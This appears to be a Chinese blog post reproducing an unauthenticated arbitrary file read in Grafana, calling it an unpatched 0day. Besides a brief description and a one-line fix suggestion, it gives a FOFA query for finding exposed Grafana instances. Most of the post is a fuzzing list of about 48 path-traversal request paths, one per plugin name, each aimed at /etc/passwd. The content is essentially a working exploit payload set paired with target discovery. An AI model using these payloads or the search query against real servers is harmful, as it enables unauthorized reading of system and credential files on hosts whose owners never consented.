zoukankan      html  css  js  c++  java
  • Grafana 未授权任意文件读取漏洞

    漏洞原理:

      Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。Grafana 存在未授权任意文件读取漏洞,攻击者在未经身份验证的情况下可通过该漏洞读取主机上的任意文件。

    CVE编号:

      暂无,处0day状态

    fofa语法:

      app="Grafana"

    影响范围:

       Grafana v8.2.6

    漏洞复现:

    因为不知道Grafana安装了什么插件需要模糊测试:

    /public/plugins/alertGroups/../../../../../../../../etc/passwd
    /public/plugins/alertlist/../../../../../../../../etc/passwd
    /public/plugins/alertmanager/../../../../../../../../etc/passwd
    /public/plugins/annolist/../../../../../../../../etc/passwd
    /public/plugins/barchart/../../../../../../../../etc/passwd
    /public/plugins/bargauge/../../../../../../../../etc/passwd
    /public/plugins/canvas/../../../../../../../../etc/passwd
    /public/plugins/cloudwatch/../../../../../../../../etc/passwd
    /public/plugins/dashboard/../../../../../../../../etc/passwd
    /public/plugins/dashlist/../../../../../../../../etc/passwd
    /public/plugins/debug/../../../../../../../../etc/passwd
    /public/plugins/elasticsearch/../../../../../../../../etc/passwd
    /public/plugins/gauge/../../../../../../../../etc/passwd
    /public/plugins/geomap/../../../../../../../../etc/passwd
    /public/plugins/gettingstarted/../../../../../../../../etc/passwd
    /public/plugins/grafana-azure-monitor-datasource/../../../../../../../../etc/passwd
    /public/plugins/grafana/../../../../../../../../etc/passwd
    /public/plugins/graph/../../../../../../../../etc/passwd
    /public/plugins/graphite/../../../../../../../../etc/passwd
    /public/plugins/heatmap/../../../../../../../../etc/passwd
    /public/plugins/histogram/../../../../../../../../etc/passwd
    /public/plugins/influxdb/../../../../../../../../etc/passwd
    /public/plugins/jaeger/../../../../../../../../etc/passwd
    /public/plugins/live/../../../../../../../../etc/passwd
    /public/plugins/logs/../../../../../../../../etc/passwd
    /public/plugins/loki/../../../../../../../../etc/passwd
    /public/plugins/mixed/../../../../../../../../etc/passwd
    /public/plugins/mssql/../../../../../../../../etc/passwd
    /public/plugins/mysql/../../../../../../../../etc/passwd
    /public/plugins/news/../../../../../../../../etc/passwd
    /public/plugins/nodeGraph/../../../../../../../../etc/passwd
    /public/plugins/opentsdb/../../../../../../../../etc/passwd
    /public/plugins/piechart/../../../../../../../../etc/passwd
    /public/plugins/pluginlist/../../../../../../../../etc/passwd
    /public/plugins/postgres/../../../../../../../../etc/passwd
    /public/plugins/prometheus/../../../../../../../../etc/passwd
    /public/plugins/stat/../../../../../../../../etc/passwd
    /public/plugins/state-timeline/../../../../../../../../etc/passwd
    /public/plugins/status-history/../../../../../../../../etc/passwd
    /public/plugins/table-old/../../../../../../../../etc/passwd
    /public/plugins/table/../../../../../../../../etc/passwd
    /public/plugins/tempo/../../../../../../../../etc/passwd
    /public/plugins/testdata/../../../../../../../../etc/passwd
    /public/plugins/text/../../../../../../../../etc/passwd
    /public/plugins/timeseries/../../../../../../../../etc/passwd
    /public/plugins/welcome/../../../../../../../../etc/passwd
    /public/plugins/xychart/../../../../../../../../etc/passwd
    /public/plugins/zipkin/../../../../../../../../etc/passwd
    

    修复建议:

      关注https://grafana.com/ 官方更新。

  • 相关阅读:
    【bzoj2821】作诗(Poetize)
    ZOJ-2112-Dynamic Rankings(线段树套splay树)
    POJ- 2104 hdu 2665 (区间第k小 可持久化线段树)
    hust-1024-dance party(最大流--枚举,可行流判断)
    hdu-3046-Pleasant sheep and big big wolf(最大流最小割)
    POJ-3294-Life Forms(后缀数组-不小于 k 个字符串中的最长子串)
    POJ-Common Substrings(后缀数组-长度不小于 k 的公共子串的个数)
    POJ-2774-Long Long Message(后缀数组-最长公共子串)
    POJ-3693-Maximum repetition substring(后缀数组-重复次数最多的连续重复子串)
    spoj-694-Distinct Substrings(后缀数组)
  • 原文地址:https://www.cnblogs.com/bflw/p/15659188.html
Copyright © 2011-2022 走看看